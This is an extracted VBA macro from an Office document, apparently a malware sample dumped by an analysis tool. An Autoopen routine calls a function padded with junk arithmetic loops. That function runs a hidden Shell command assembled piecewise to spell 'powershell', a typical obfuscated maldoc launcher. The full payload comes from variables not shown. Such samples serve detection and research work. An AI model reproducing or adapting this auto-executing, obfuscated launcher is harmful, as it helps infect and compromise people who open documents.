Filename     : ./macros/01669cbecdbab8704f4800276e45b5b5791d42e774d1e90efd7e19938670e791
OLE stream   : Macros/VBA/fNMhCFasHOfm
VBA filename : fNMhCFasHOfm.cls
----------------------------------------
Attribute VB_Name = "fNMhCFasHOfm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function DooCf()
On Error Resume Next
For LYXiw = CCTnu To KCYnU
      For EoaYnY = KwHswE To 87577
         YThCNj = (54128 / CBool(zBjvd) - BLsJd / Oct(58983 / Hex(96845) / nkzkoZ + Rnd(JViAKl / Fix(37))))
Next
   rkHQbZ = 57249 - 44198
Next
For cPsuv = obOwvf To DcuCTn
      For zuTjSU = CMCYz To 31094
         WUvizK = (62217 / CBool(mLpDu) - iVZGqq / Oct(18275 / Hex(64434) / LcbrmO + Rnd(avPSj / Fix(37))))
Next
   zXUcz = 81159 - 17021
Next
DooCf = JJtWI + Shell(hCCHUCjjw + Chr(DBWumDRTc + vbKeyP + HGMaQrsN) + "owers" + jqEoaC + kMTLIcD + WTKZRBRMn, 74554 - 74554)
For qOZbX = dSJZUp To kCXSt
      For ZluncA = WBlNr To 37115
         oUNBQ = (28257 / CBool(iHmqw) - kOVwKF / Oct(94749 / Hex(67166) / wazbB + Rnd(bjvhB / Fix(37))))
Next
   jPoVC = 59719 - 41434
Next
End Function
Sub Autoopen()
On Error Resume Next
For dHzdJl = foDlW To SXnEpM
      For HbrIz = AwhbHa To 53321
         sodTRQ = (25025 / CBool(rrwibQ) - BRNSSj / Oct(4467 / Hex(31815) / jikIwN + Rnd(KuzajJ / Fix(37))))
Next
   XwpLjz = 22912 - 35454
Next
DooCf
For kHjKtI = IqYon To fEwivm
      For dpIrjq = dYSQc To 26536
         ABSDDB = (72000 / CBool(kKVwoR) - OFEZhW / Oct(89515 / Hex(96492) / dDmfkX + Rnd(LZziC / Fix(37))))
Next
   brkznF = 96285 - 42861
Next
End Sub

